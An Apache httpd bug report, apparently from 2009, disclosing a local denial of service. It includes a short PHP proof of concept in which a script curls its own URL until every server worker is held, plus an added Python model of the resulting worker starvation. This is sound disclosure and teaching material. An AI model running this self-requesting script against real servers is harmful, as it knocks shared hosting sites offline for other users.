httpd-bugs mailing list archives

From bugzi...@apache.org
Subject DO NOT REPLY [Bug 47536] New: Apacze local DOS/mod_php/mod_cgi
Date Wed, 15 Jul 2009 16:50:43 GMT
https://issues.apache.org/bugzilla/show_bug.cgi?id=47536

           Summary: Apacze local DOS/mod_php/mod_cgi
           Product: Apache httpd-2
           Version: 2.2.11
          Platform: PC
        OS/Version: Linux
            Status: NEW
          Severity: normal
          Priority: P2
         Component: mod_cgi
        AssignedTo: bugs@httpd.apache.org
        ReportedBy: iforone@spof.pl


Hello,

I've found a bug in apache* server which makes a local DOS attack possible.
The attack consists in executing a code (php** for example) which executes
itself, and the server stops accepting new clients.

Vulnerable to attack are mod_php and mod_cgi.
It would appear that php made by mod_fastcgi is resistant (the server does not
accept new requests for the socket which we're attacking but the
rest works stable - in the situation when every site has its own socket,
someone who attacks can turn off 'his own' site only.)

The attack is not fine but no limits (process/memory/processor time limit) can
block it.
I managed to lead to the situation when 1 php process was blocking the server.

Software:
- HTTPD:
    * apache-2.2.11
    * apache-2.2.9
- OS:
    * gentoo (linux-2.6.29/linux-2.6.27)
    * freebsd (7.0)
- PHP:
    * 5.2.10 (+suhosin)
    * 5.2.9

POC:
-----------------------------------------------------------------
<?php
        $url = $_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
        echo $url;
        if (!function_exists('curl_init'))
            die("no curl");
        $handle = curl_init("http://$url");
        curl_setopt($handle, CURLOPT_USERAGENT, "www_agent");
        curl_exec($handle);
        curl_close($handle);
?>
-----------------------------------------------------------------

*  It's hard for me to estimate if the possibility of carrying out the attack is
caused by 'weakness' of the server or php - if you think
   that it's not the server's fault, please contact me.
** The attack was carried out with the aid of php, but I think that any code
(used as cgi) can DOS httpd.

If you need any additional information or think that it isn't a bug, please contact
me.

Yours sincerely,
Bartosz /zynzel/ Kupidura
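
The report's two observations, modelled as an added example (not code from the reporter or from Apache): a handler that requests itself holds one worker slot per hop while waiting idle, so a pool shared by all sites is starved, while per-site pools confine the stall to the requesting site. Python thread pools stand in for server workers; the pool size of 4 and the 0.2 s / 0.3 s timings are assumptions.

```python
# Added illustration: a thread-pool model of worker starvation, not Apache code.
import concurrent.futures as cf
import threading
import time

def self_requesting(pool, release, held):
    """Model of a handler that fetches its own URL and blocks on the reply."""
    if release.is_set():                 # model is being torn down
        return
    held.append(threading.get_ident())   # this worker slot is now occupied
    try:
        pool.submit(self_requesting, pool, release, held)  # nested request
    except RuntimeError:                 # pool already shut down
        return
    release.wait()                       # idle wait: no CPU, no extra memory

def probe(pool, timeout=0.3):
    """Return True if an ordinary request gets a worker within `timeout`."""
    fut = pool.submit(lambda: "ok")
    try:
        return fut.result(timeout=timeout) == "ok"
    except cf.TimeoutError:
        fut.cancel()
        return False

def simulate(shared, workers=4):
    """Return (slots held by the chain, whether another site is still served)."""
    release, held = threading.Event(), []
    attacker_pool = cf.ThreadPoolExecutor(max_workers=workers)
    other_pool = attacker_pool if shared else cf.ThreadPoolExecutor(max_workers=workers)
    attacker_pool.submit(self_requesting, attacker_pool, release, held)
    time.sleep(0.2)                      # let the chain occupy every free slot
    occupied, served = len(held), probe(other_pool)
    release.set()                        # unblock the waiting handlers
    for p in {attacker_pool, other_pool}:
        p.shutdown(wait=True)
    return occupied, served

if __name__ == "__main__":
    print("shared pool   :", simulate(shared=True))    # (4, False)
    print("per-site pools:", simulate(shared=False))   # (4, True)
```

In both runs every blocked worker is idle, which is why per-process CPU or memory limits do not stop the stall; only the number of slots available to one site bounds it.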
